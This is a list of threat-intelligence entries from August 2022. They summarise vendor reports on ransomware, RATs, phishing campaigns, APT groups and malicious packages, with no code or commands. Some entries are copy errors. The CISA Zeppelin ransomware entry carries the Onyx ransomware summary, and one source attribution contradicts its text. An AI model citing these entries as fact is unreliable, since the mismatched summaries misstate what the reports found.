- Cyble
- Intel Name:
- A_Dot_Net_Based_Moisha_Ransomware
- Date of Scan:
- 2022-08-26
- Impact:
- LOW
- Summary:
- Researchers from Cyble have come across a Twitter post about a new ransomware variant named Moisha. A .Net-based ransomware, Moisha was first identified in mid-August 2022, and the name of the TA is PT_MOISHA team.
Source:
https://blog.cyble.com/2022/08/25/moisha-ransomware-in-action/
—
- Intel Source:
- Microsoft
- Intel Name:
- Iran_Based_Threat_Actor_MERCURY_Leveraging_Exploitation_of_Log4j_2_Vulnerabilities
- Date of Scan:
- 2022-08-26
- Impact:
- MEDIUM
- Summary:
- Microsoft Threat Intelligence and 365 Defender Research team have detected Iran-based threat actor MERCURY leveraging exploitation of Log4j 2 vulnerabilities in SysAid applications against organizations all located in Israel.
—
- Intel Source:
- Labs K7 Security
- Intel Name:
- BleachGap_ransomware_reappeared
- Date of Scan:
- 2022-08-26
- Impact:
- LOW
- Summary:
- Researchers from Labs K7 Security have analyzed the BleachGap ransomware and found that threat actors are modifying the attack techniques of this malware for a possible major attack that might be planned in the future.
Source:
https://labs.k7computing.com/index.php/bleachgap-revamped/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Actors_Leveraging_Genshin_Impact_Driver
- Date of Scan:
- 2022-08-25
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers investigated the mhyprot2.sys and found a vulnerability of an anti-cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware.
—
- Intel Source:
- Trellix
- Intel Name:
- Diving_Deep_into_Qbot_Malware
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Researchers from the Trellix SecOps team have observed an uptick in the Qbot malware infections in recent months. It is an active threat for over 14 years and continues to evolve, adopting new infection vectors to evade detection mechanisms.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html
—
- Intel Source:
- Group-IB
- Intel Name:
- A_0ktapus_Phishing_Campaign
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Researchers from Group-IB Threat Intelligence Team have detected 169 unique domains involved in the 0ktapus phishing campaign. While analyzing the phishing sites, they found an image that is legitimately used by sites leveraging Okta authentication, being used by the phishing kit.
—
- Intel Source:
- IronNet
- Intel Name:
- Multiple_Known_Malware_Findings_from_the_BlackHat_NOC
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- IroNet Hunters uncovered several active malware infections on the Black Hat network, including Shlayer malware, North Korean-attributed SHARPEXT malware, and NetSupport RAT malware.
Source:
https://www.ironnet.com/blog/a-view-from-the-black-hat-noc-key-findings
—
- Intel Source:
- Cofense
- Intel Name:
- Threat_Actors_Leveraging_Compromised_Microsoft_Dynamics_365_Voice_Account_for_Phishing_Attack
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Researchers from Cofense have identified a widespread campaign where threat actors use a compromised Dynamics 365 Customer Voice business account and a link posing as a survey to steal Microsoft 365 credentials.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- The_Deep_examination_of_Wiper_Malware
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Researchers from CrowdStrikes Research Team have identified how threat actors use legitimate third-party drivers to bypass the visibility and detection capabilities of security mechanisms and solutions.
Source:
https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-2/
—
- Intel Source:
- Avast
- Intel Name:
- AgentTesla_is_Back_With_a_New_Campaign
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Threat researchers from Avast have identified a new malicious campaign and it is threatening businesses around the world. The campaign is targeting users in Spain, Portugal, Romania, and multiple countries in South America.
—
- Intel Source:
- Securelist
- Intel Name:
- Kimsukys_hackers_using_C2_operations_with_GoldDragon_malware
- Date of Scan:
- 2022-08-25
- Impact:
- LOW
- Summary:
- Researchers from Securelist have identified the Kimsuky threat group continuously evolves its malware infection schemes and adopts novel techniques to hinder analysis. It is one of the most prolific and active threat actors on the Korean Peninsula, operates several clusters and GoldDragon malware is one of the most frequently used.
Source:
https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/
—
- Intel Source:
- Zscaler
- Intel Name:
- Pirated_Software_Download_Sites_Delivering_InfoStealer_Malware
- Date of Scan:
- 2022-08-24
- Impact:
- LOW
- Summary:
- Researchers from Zscaler Threat Labs have discovered multiple ongoing threat campaigns distributing info-stealer malware by targeting victims trying to download pirated software applications.
—
- Intel Source:
- ASEC
- Intel Name:
- BitRAT_and_XMRig_CoinMiner_Leveraging_Windows_License_Verification_Tool
- Date of Scan:
- 2022-08-24
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered the distribution of BitRAT and XMRig CoinMiner disguised as a Windows license verification tool.
—
- Intel Source:
- CISA
- Intel Name:
- The_active_exploitation_of_multiple_vulnerabilities_and_Exposures_against_Zimbra_Collaboration_Suite
- Date of Scan:
- 2022-08-24
- Impact:
- LOW
- Summary:
- CISA and MS-ISAC researchers have identified cyber threat actors targeting unpatched Zimbra Collaboration Suite instances in both government and private sector networks.
—
- Intel Source:
- ASEC
- Intel Name:
- AsyncRAT_Being_Distributed_in_Fileless_Form
- Date of Scan:
- 2022-08-24
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered malicious AsyncRAT codes that are being distributed in fileless form. It is executed in fileless form through multiple script files and is thought to be distributed as a compressed file attachment in emails.
—
- Intel Source:
- Zscaler
- Intel Name:
- PiratedSoftwareDownloadSitesDeliveringInfoStealerMalware
- Date of Scan:
- 2022-08-24
- Impact:
- LOW
- Summary:
- Researchers from Zscaler Threat Labs have discovered multiple ongoing threat campaigns distributing info-stealer malware by targeting victims trying to download pirated software applications.
—
- Intel Source:
- Wordsfence
- Intel Name:
- Trends_in_Ukrainian_Domain_attacks
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from Wordfence have identified 16 attack types that triggered more than 85 different firewall rules across protected websites with Ukrainian top-level domains.
Source:
https://www.wordfence.com/blog/2022/08/analyzing-attack-data-and-trends-targeting-ukrainian-domains/
—
- Intel Source:
- Uptycs
- Intel Name:
- A_malicious_use_of_Tox_protocol_for_coinminers
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from Uptycs have examined malware samples that do not do anything explicitly malicious, but they feel that it might be part of a coinminer campaign. Additionally, they are observing it for the first time where Tox protocol is used to run scripts onto the machine.
Source:
https://www.uptycs.com/blog/is-tox-the-new-cc-method-for-coinminers
—
- Intel Source:
- Cyble
- Intel Name:
- IBAN_clipper_malware_targeting_Windows_operating_systems
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from Cyble Labs have highlighted an International Bank Account Number (IBAN) Clipper Malware after identifying a Threat Actor on a cybercrime forum offering monthly subscription-based services of clipper malware targeting Windows operating systems.
Source:
https://blog.cyble.com/2022/08/22/dissecting-iban-clipper/
—
- Intel Source:
- Fortinet
- Intel Name:
- A_Detailed_Analysis_of_PivNoxy_and_Chinoxy_malware
- Date of Scan:
- 2022-08-23
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have identified an attack against the telecommunication agency in South Asia that began with a simple email that initially appeared to be a standard malicious spam email message. However, the attached Word document was weaponized using a malicious tool, Royal Road, and is equipped with an exploit for an Equation Editor vulnerability (CVE-2018-0798).
Source:
https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis
—
- Intel Source:
- Google blog
- Intel Name:
- Iranian_hackers_Leveraging_New_Tool_to_Steal_Email_From_Victims
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from Google Threat Analysis Group have observed New Iranian APT data extraction tool called HYPERSCRAPE. It is written in .NET for Windows PCs and is designed to run on the attacker’s machine.
Source:
https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/
—
- Intel Source:
- SentinelOne
- Intel Name:
- XCSSET_Malware_updated_with_latest_version
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from SentinelOne have reviewed the changes made to the latest versions of XCSSET malware and reveal some of the contexts in which these threat actors operate.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Astaroth_Guildma_malware_pushed_by_malspam
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed an Astaroth (Guildma) malware infection generated from a malicious Boleto-themed email pretending to be from Grupo Solução & CIA. Boleto is a payment method used in Brazil, while Grupo Solução & CIA is Brazil-based company.
—
- Intel Source:
- MalwareBytes
- Intel Name:
- MalspamusedbyattackerstodeliverAgentTeslaRAT
- Date of Scan:
- 2022-08-23
- Impact:
- LOW
- Summary:
- Malwarebytes Threat Intelligence researchers have identified spam emails containing images and CHM files. Upon clicking, It’s calling PowerShell commands and started executing AgentTesla through RegAsm.exe.
Source:
https://twitter.com/MBThreatIntel/status/1561736526819639298
—
- Intel Source:
- MalwareBytes
- Intel Name:
- FIN7_rewrite_JSSLoader_malware_with_expanded_capabilities
- Date of Scan:
- 2022-08-22
- Impact:
- MEDIUM
- Summary:
- Researchers at Malwarebytes has identified a malspamcampaign in late June that they attribute to the FIN7 APT group. FIN7 has rewritten JSSLoader malware with expanded capabilities as well as new functions that include data exfiltration.
Source:
https://malwarebytes.app.box.com/s/ym6r7o5hq0rx2nxjbctfv2sw5vx386ni
—
- Intel Source:
- Sucuri
- Intel Name:
- SocGholish_JavaScript_Malware_Back_into_Action
- Date of Scan:
- 2022-08-22
- Impact:
- LOW
- Summary:
- Researchers from Sucuri have analysed the SocGholish JavaScript Malware and they are outlining the injections and URLs used in the website malware portion of the SocGholish attack outside of the NDSW/NDSX campaign.
Source:
https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html
—
- Intel Source:
- Cyble
- Intel Name:
- New_BianLian_Ransomware_Targeting_Multiple_Industries
- Date of Scan:
- 2022-08-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Cyble have observed that malware written in the programming language “Go” has recently been popular among Threat Actors. Also, during their daily threat hunting exercise, they came across a Twitter post about a ransomware variant written in Go named BianLian.
Source:
https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/
—
- Intel Source:
- Zscaler
- Intel Name:
- Grandoreiro_Banking_Malware_Targeting_Spanish_and_Mexican_Organizations
- Date of Scan:
- 2022-08-22
- Impact:
- LOW
- Summary:
- Researchers from Zscaler ThreatLabs have observed a Grandoreiro banking malware campaign. In this campaign, the threat actors impersonate government officials from the Attorney General’s Office of Mexico City and from the Public Ministry in the form of spear-phishing emails in order to lure victims to download and execute ‘Grandoreiro,’ a prolific banking trojan.
—
- Intel Source:
- Cyble
- Intel Name:
- XWorm_RAT_with_Ransomware_and_HNVC_attack_capabilities
- Date of Scan:
- 2022-08-22
- Impact:
- LOW
- Summary:
- Researchers from Cyble labs have discovered a dark web post where a malware developer was advertising a powerful Windows RAT and its redirecting to the website of malware developer, where multiple malicious tools are being sold.
Source:
https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/
—
- Intel Source:
- Sucuri
- Intel Name:
- A_malicious_JavaScript_injection_affecting_WordPress_websites
- Date of Scan:
- 2022-08-22
- Impact:
- LOW
- Summary:
- A recent spike in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevent prompts which takes victims to download remote access trojan malware was observed and analyzed by Sucuri reserachers
Source:
https://blog.sucuri.net/2022/08/fake-ddos-pages-on-wordpress-lead-to-drive-by-downloads.html
—
- Intel Source:
- Group-IB
- Intel Name:
- ATMZOW_JS_Sniffer_Campaign_Connected_to_Hancitor_Malware
- Date of Scan:
- 2022-08-21
- Impact:
- MEDIUM
- Summary:
- Researchers from Group-IB have identified the connection between ATMZOW JS sniffer campaign and Hancitor malware downloader were both operated by the same threat actor. They have collected information about ATMZOW’s recent activity and found ties with a phishing campaign targeting clients of a US bank based on the same JS obfuscation technique.
—
- Intel Source:
- Group-IB
- Intel Name:
- APT41_targeted13entitiesinU.S,_Taiwan,_India,_Vietnam_and_China
- Date of Scan:
- 2022-08-21
- Impact:
- MEDIUM
- Summary:
- GroupIB has been monitoring APT41 activities since 2021 and generated report which documents about their target across 13 organizations geographically spanning across the U.S, Taiwan, India, Vietnam, and China.
—
- Intel Source:
- ProofPoint
- Intel Name:
- TA558_Targets_Hospitality_and_Travel_firms
- Date of Scan:
- 2022-08-20
- Impact:
- MEDIUM
- Summary:
- Researchers at ProofPoint has monitoring activities of threat actor TA558 since 2018, and in 2022 the actor has still targeting hospitality, travel and related industries based in Latin America, North America, and western Europe. Moreover currently TA558 has shifted tactics to URLs and container files to distribute malware.
—
- Intel Source:
- Cybereason
- Intel Name:
- Attackers_Leveraging_Bumblebee_Loader
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- Cybereason GSOC team have analyzed a case that involved a Bumblebee Loader infection and its operators conduct intensive reconnaissance activities and redirect the output of executed commands to files for exfiltration.
—
- Intel Source:
- SocInvestigations
- Intel Name:
- Reemergence_of_Raccoon_Infostealer_Malware_with_New_TTPS
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- SocInvestigation researchers found new TTPs of Raccoon Infostealer Malware. It is an info stealer type malware available as malware-as-a-service on underground forums and this is a robust stealer that allows the stealing of data such as passwords, cookies, and autofill data from browsers.
—
- Intel Source:
- Securelist
- Intel Name:
- Malicious_PyPi_packages_turn_Discord_into_info_stealing_malware
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- Researchers from Kaspersky have analyzed two PyPi packages that contain info-stealing malware and also modify the Discord client as well. The stealers in those packages focus on collecting account credentials from cryptocurrency wallets, Steam, and Minecraft, while an injected script monitors for inputs like email addresses, passwords, and billing information.
Source:
https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/
—
- Intel Source:
- VirusTotal
- Intel Name:
- Detailed_Analysis_of_Follina_Vulnerability
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- VirusTotal cyber threat hunting team deeply analyzed the Follina vulnerability and provided a high-level overview of all observed attacks with a focus on the ones that took place before the 0-day was publicly disclosed and practical recommendations on how to monitor and hunt Follina samples.
Source:
https://blog.virustotal.com/2022/08/hunting-follina.html
—
- Intel Source:
- Secureworks
- Intel Name:
- Diving_Deep_into_DarkTortilla_Malware
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- Researchers from Secureworks Counter Threat Unit have found long-term threat DarkTortilla crypter is still evolving. It usually delivers information stealers and remote access trojans (RATs) like AgentTesla, AsyncRat, NanoCore, and RedLine, though some samples have been seen delivering such targeted payloads as Cobalt Strike and Metasploit.
Source:
https://www.secureworks.com/research/darktortilla-malware-analysis
—
- Intel Source:
- ESET
- Intel Name:
- Lazarus_Group_Targeting_Job_Seekers_with-macOS_Malware
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- Slovak cybersecurity firm ESET have identified the North Korea-backed Lazarus Group targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets.
Source:
https://twitter.com/ESETresearch/status/1559553342057205761
—
- Intel Source:
- Securonix
- Intel Name:
- Newly_Active_Malicious_Scanner_IPs
- Date of Scan:
- 2022-08-19
- Impact:
- LOW
- Summary:
- Internal scan, No git required
Source:
Internal Source
—
- Intel Source:
- Esentire
- Intel Name:
- A_new_variant_of_NJRAT
- Date of Scan:
- 2022-08-18
- Impact:
- LOW
- Summary:
- Esentire Cyber Threat Hunting team have discovered a new variant of NJRAT which is capable of logging keystrokes, viewing the victim’s camera, and remotely controlling the system.
Source:
https://www.esentire.com/blog/njrat-comes-disguised-as-video-streaming-software
—
- Intel Source:
- Mandiant
- Intel Name:
- Iranian_Threat_Actor_UNC3890_targets_Israeli_entities
- Date of Scan:
- 2022-08-18
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers found a cyber espionage campaign targeting Israeli entities and organizations of various sectors, including government, shipping, energy and healthcare via social engineering lures and a potential watering hole. The attack have been attributed to UNC3890.
Source:
https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping
—
- Intel Source:
- CheckMarx
- Intel Name:
- Python_s_Top_Packages_attack
- Date of Scan:
- 2022-08-18
- Impact:
- LOW
- Summary:
- Researchers from Checkmarx security have detected a large-scale attack on the Python ecosystem with multi-stage persistent malware. A PyPi user account published a dozen malicious Typosquatting packages under the names of popular projects with slight permutation.
—
- Intel Source:
- Trustwave
- Intel Name:
- Cyber_Weapons_Used_in_the_Ukraine_Russia_War
- Date of Scan:
- 2022-08-18
- Impact:
- MEDIUM
- Summary:
- Cyberattacks leveraging malware are an important part of modern hybrid war strategy While conventional warfare is conducted on the battlefield and limited by several factors, cyber warfare continues in cyber space, offering the chance to infiltrate and damage targets far behind the frontlines
—
- Intel Source:
- Recorded Future
- Intel Name:
- Diving_deep_into_RedAlphas_cyber_espionage_activity
- Date of Scan:
- 2022-08-17
- Impact:
- LOW
- Summary:
- Researchers from Recordedfuture have analyzed multiple campaigns conducted by the Chinese state-sponsored threat activity group RedAlpha. It is very likely sought to gain access to email accounts and other online communications of targeted individuals and organizations.
Source:
https://go.recordedfuture.com/hubfs/reports/ta-2022-0816.pdf
—
- Intel Source:
- Securelist
- Intel Name:
- Surge_in_attack_through_malicious_Browser_Extension
- Date of Scan:
- 2022-08-17
- Impact:
- LOW
- Summary:
- Securelist analysts documented their findings about multiple Browser Extensions which have been targeting atleast 1.31 million users. The most prevalent threat is a family of adware called WebSearch, which masquerade as PDF viewers.
Source:
https://securelist.com/threat-in-your-browser-extensions/107181/
—
- Intel Source:
- Trend Micro
- Intel Name:
- Trend_Micro_Research_on_Cloud_based_Cryptocurrency_mining
- Date of Scan:
- 2022-08-17
- Impact:
- MEDIUM
- Summary:
- TrendMicro in their research document shared their concerns about the impact on organization who running cloud instances and that potential victims of malicious cryptocurrency mining could be from any country or sector, making cloud-based cryptocurrency-mining attacks a global concern for companies.
—
- Intel Source:
- Cyble
- Intel Name:
- Typhon_Stealer_being_spread_through_Phishing_sites
- Date of Scan:
- 2022-08-16
- Impact:
- LOW
- Summary:
- Cyble researchers analyzed a sample url which hosts a Windows executable payload. This Windows executable is a variant of Typhon stealer malware delivered via a crafted .lnk file.
Source:
https://blog.cyble.com/2022/08/16/phishing-site-used-to-spread-typhon-stealer/
—
- Intel Source:
- Sonatype
- Intel Name:
- PyPI_Package_Drops_Fileless_Cryptominer_to_Linux_Systems
- Date of Scan:
- 2022-08-16
- Impact:
- LOW
- Summary:
- Researchers from Sonatype have identified a ‘secretslib’ PyPI package that means ‘secrets matching and verification made easy’. On a closer inspection though, the package covertly runs cryptominers on the Linux machine in-memory, a technique largely employed by fileless malware and crypters.
Source:
https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0010_Armageddon_leveraging_GammaLoad_and_GammaSteel_malwares
- Date of Scan:
- 2022-08-16
- Impact:
- LOW
- Summary:
- CERT-UA has tracked an attack since the first half of 2022, where the distribution of HTM-droppers via email leads to delivery of GammaLoad.PS1 malware and later delivers GammaSteel.PS1.
—
- Intel Source:
- Microsoft
- Intel Name:
- Phishing_campaign_by_Russian_Threat_Actor_SEABORGIUM
- Date of Scan:
- 2022-08-16
- Impact:
- MEDIUM
- Summary:
- MSTIC disrupted SEABORGIUM threat actor campaign which belongs to Russia. Its campaigns involve persistent phishing and credential theft campaigns leading to intrusions and data theft.
—
- Intel Source:
- Symantec
- Intel Name:
- Russian_hackers_targeting_Ukraine_with_default_Word_template_hijacker
- Date of Scan:
- 2022-08-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have observed campaigns that show phishing messages carrying a self-extracting 7-Zip archive that fetches an XML file from an “xsph.ru” subdomain associated with Gamaredon since May 2022.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/russia-ukraine-shuckworm
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_chat_application_MiMi_compromised_by_Iron_Tiger_malware
- Date of Scan:
- 2022-08-15
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMcro discovered a server hosting the malicious samples who compromised chat application Mimi. This sample malware family a HyperBro used by Iron Tiger, an advanced persistent threat (APT) group that has been performing cyberespionage for almost a decade and now targeting Windows and Mac OS.
—
- Intel Source:
- Weixin
- Intel Name:
- The_observation_of_Conti_Group_activity_used_by_Russian_threat_actors
- Date of Scan:
- 2022-08-15
- Impact:
- MEDIUM
- Summary:
- Qi Anxin Threat Intelligence Center has been tracking on Russian-speaking threat actors and observed that Conti Group used Exchange vulnerabilities to target companies have a label “rich”.
—
- Intel Source:
- Cyble
- Intel Name:
- MikuBot_spies_on_Victims_using_hidden_VNC
- Date of Scan:
- 2022-08-15
- Impact:
- MEDIUM
- Summary:
- Researchers at Cyble Research Labs has identified a new malware called ‘MikuBot’, which Threat Actor was advertising in cybercrime forums. The bot steals sensitive data and runs hiddden VNC sessions, that allow threat actors to remotely access the target’s system.
Source:
https://blog.cyble.com/2022/08/11/mikubot-spotted-in-the-wild/
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_new_deployment_of_CopperStealer_s_distributing_malware
- Date of Scan:
- 2022-08-15
- Impact:
- MEDIUM
- Summary:
- TrendMicro shared their analyses with a public on the a new development of CopperStealer distributing malware by abusing browser stealer, adware browser extension, or remote desktop.
—
- Intel Source:
- Morphisec
- Intel Name:
- A_new_upgrade_on_the_activity_of_APT_C_35_or_DoNot_Team
- Date of Scan:
- 2022-08-12
- Impact:
- MEDIUM
- Summary:
- Researchers at Morphisec Labs has monitored the activity of DoNot Team/APT-C-35, where the group updates a new module to its Windows framework.
Source:
https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed
—
- Intel Source:
- Cyble
- Intel Name:
- Onyx_Ransomware_s_Recent_Operations
- Date of Scan:
- 2022-08-12
- Impact:
- LOW
- Summary:
- Cyble researchers found an updated Onyx ransomware which is based on Chaos ransomware and that ransomware renamed its leak site from “ONYX NEWS” to “VSOP NEWS.”
Source:
https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/
—
- Intel Source:
- ASEC
- Intel Name:
- A_distribution_of_Monero_CoinMiner_by_Webhards
- Date of Scan:
- 2022-08-12
- Impact:
- LOW
- Summary:
- The ASEC analysis team has discovered that Monero CoinMiner, also known as XMRig, is being distributed via file-sharing websites such as Korean webhards and torrents.
—
- Intel Source:
- CISA
- Intel Name:
- Zeppelin_Ransomware
- Date of Scan:
- 2022-08-12
- Impact:
- MEDIUM
- Summary:
- Cyble researchers found an updated Onyx ransomware which is based on Chaos ransomware and that ransomware renamed its leak site from “ONYX NEWS” to “VSOP NEWS.”
—
- Intel Source:
- Bitsight
- Intel Name:
- Emotet_re-introduction_SMB_spreader_module
- Date of Scan:
- 2022-08-11
- Impact:
- LOW
- Summary:
- Researchers at Bitsight has observed the Emotet botnets version Epoch4 delivering a new module to the infected systems that turned out to be a credit card stealer targeting Google Chrome. Later, they found that Emotet version Epoch4 also re-introduced the SMB spreader module.
Source:
https://www.bitsight.com/blog/emotet-smb-spreader-back
—
- Intel Source:
- Palo Alto
- Intel Name:
- BlueSky_Ransomware_targets_Windows_hosts_and_utilizes_multithreading
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- Researchers at Palo Alto has analysed code samples of BlueSky Ranswomware, which they found to be connected with Conti Ransomware Group. The multithreaded structure of BlueSky code similarities with Conti V3. Moreover, BlueSky also closely resembles algorithm for file encryption with Babuk Ransomware too.
Source:
https://unit42.paloaltonetworks.com/bluesky-ransomware/
—
- Intel Source:
- Zscaler
- Intel Name:
- AiTM_attack_targets_Gmail_Enterprise_users
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- Zscaler researchers followed upon their last findings about AiTM phishing campaign againts the Microsoft email services and found that same campaign has been targeting enterprise users of Gmail.
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Yanluowang ransomware gang targets Cisco
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- Cisco Talos has analyzed a recent attack on Cisco by Yanluowang ransomware group which breached its corporate network in late May. The attackers could only harvest and steal non-sensitive data from a Box folder linked to a compromised employee’s account.
Source:
https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html
—
- Intel Source:
- Cisco
- Intel Name:
- Raspberry_Robin_tries_to_remain_undetected
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco has analysed a distingushed pattern of msiexec.exe usage across different endpoints. As they drilled down to individual assets, they found traces of Raspberry Robin malware.
Source:
https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks
—
- Intel Source:
- Palo Alto
- Intel Name:
- Tropical_Scorpius_deploys_ROMCOM_RAT_in_Cuba_Ransomware_operations
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- A threat actor Tropical Scorpius dubbed by PaloAlto researchers have changed their TTPs and is also said to be associated with Cuba ransomware operations.
Source:
https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/
—
- Intel Source:
- Securelist
- Intel Name:
- DeathStalker’s_VileRAT_continue_target_Foreign_and_Crypto_Exchanges
- Date of Scan:
- 2022-08-11
- Impact:
- MEDIUM
- Summary:
- Securelist has shared that the threat actor known as DeathStalker has continued to target and disrupt foreign and cryptocurrency exchanges around the world throughout 2022 using the VileRAT malware. Since late 2021, the infection technique has changed a little bit, but the initial infection vector is still a malicious message is sent to targets via email. In July 2022, Securelist also noticed that the attackers leveraged chatbots that are embedded in targeted companies’ public websites to send malicious DOCX to their targets.
Source:
https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/
—
- Intel Source:
- Securelist
- Intel Name:
- Korean_speaking_APT_deploys_DTrack_and_Maui_Ransomware
- Date of Scan:
- 2022-08-10
- Impact:
- MEDIUM
- Summary:
- Researchers from SecureList were able to attribute Maui ransomware attack to korean speaking APT group called Andriel. They also found out that before deploying the ransomware they deployed a variant of DTrack malware.
Source:
https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/
—
- Intel Source:
- Fortinet
- Intel Name:
- SmokeLoader_malware_drops_zgRAT_by_exploiting_old_flaws
- Date of Scan:
- 2022-08-10
- Impact:
- MEDIUM
- Summary:
- Researchers at FortiGuard Labs has analysed a recent instance of SmokeLoader, where the malware exploiting five years old CVE-2017-0199 and CVE-2017-11882. This malware sample drops zgRAT, a rare payload compared to previously delivers by SmokeLoader.
Source:
https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities?&web_view=true
—
- Intel Source:
- Palo Alto
- Intel Name:
- IcedID_or_Bokbot_infection_led_to_Cobalt_Strike
- Date of Scan:
- 2022-08-10
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs has monitored OSINT sources and identified a new infection of IcedID delivering CobaltStrike.
—
- Intel Source:
- Resecurity
- Intel Name:
- LogoKit_returns_leveraging_Open_Redirect_Vulnerabilities
- Date of Scan:
- 2022-08-10
- Impact:
- LOW
- Summary:
- Researchers at Resecurity has discovered that threat actors leveraging Open Redirect Vulnerabilities popular in online services and apps to bypass spam filters to ultimately deliver phishing content.
—
- Intel Source:
- Kaspersky
- Intel Name:
- Chinese_APT_group_targets_Asia_and_Eastern_Europe
- Date of Scan:
- 2022-08-09
- Impact:
- MEDIUM
- Summary:
- Kaspersky reseacrhers found series of attacks targeting organizations in Asia and Eastern Europe. These attacks have been attributed to Chinese APT group TA428.
—
- Intel Source:
- Walmart
- Intel Name:
- Drilling_down_into_SharpEx_browser_extension_malware
- Date of Scan:
- 2022-08-09
- Impact:
- LOW
- Summary:
- Walmart researchers further drilled down on analyzing a browser extension dubbed SharpExt used by north korean threat actor Kimsuky. The goal of the extension is to steal emails and attachments from the victims.
—
- Intel Source:
- DFIR Report
- Intel Name:
- BumbleBee_malware_found_its_way_to_Domain_Admin
- Date of Scan:
- 2022-08-09
- Impact:
- MEDIUM
- Summary:
- DFIR Report researchers analyzed an intrusion which involved BumbleBee as the initial access vector. The intrusion began with a password protected zipped ISO file.
Source:
https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/
—
- Intel Source:
- Netlab 360
- Intel Name:
- Orchard_Botnet_used_to_generate_malicious_domains
- Date of Scan:
- 2022-08-09
- Impact:
- LOW
- Summary:
- Researchers from Qihoo 360’s Netlab security team came across a new botnet named Orchard which was using Bitcoin creator Satoshi Nakamoto’s account transaction information to generate malicious domain names to conceal its command-and-control (C2) infrastructure.
—
- Intel Source:
- PTSecurity
- Intel Name:
- APT31_targets_Russian_companies
- Date of Scan:
- 2022-08-08
- Impact:
- MEDIUM
- Summary:
- PT Expert Security Center analysts found an attack targeting Russian media and energy companies. These attacks have been attributed to APT31.
Source:
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/
—
- Intel Source:
- Meta
- Intel Name:
- Two_cyber_espionage_operations_by_Bitter_APT_and_APT36
- Date of Scan:
- 2022-08-08
- Impact:
- MEDIUM
- Summary:
- Researchers at Meta has published a Quarter Threat report where they took action on two cyber espionage operations in South Asia, both the operations was linked to Biter APT and APT36 respectively. Researchers has also shared new and notewrothy TTPs for both the actors.
Source:
https://about.fb.com/wp-content/uploads/2022/08/Quarterly-Adversarial-Threat-Report-Q2-2022.pdf
—
- Intel Source:
- Crowdstrike
- Intel Name:
- Four_CATAPULT_SPIDER_Challenges
- Date of Scan:
- 2022-08-08
- Impact:
- LOW
- Summary:
- Crowdstrike has published a blog describing about intended approach to solvE the challenges of the eCrime track. The participants in the Adversary Quest analyzed new activity by CATAPULT SPIDER.
Source:
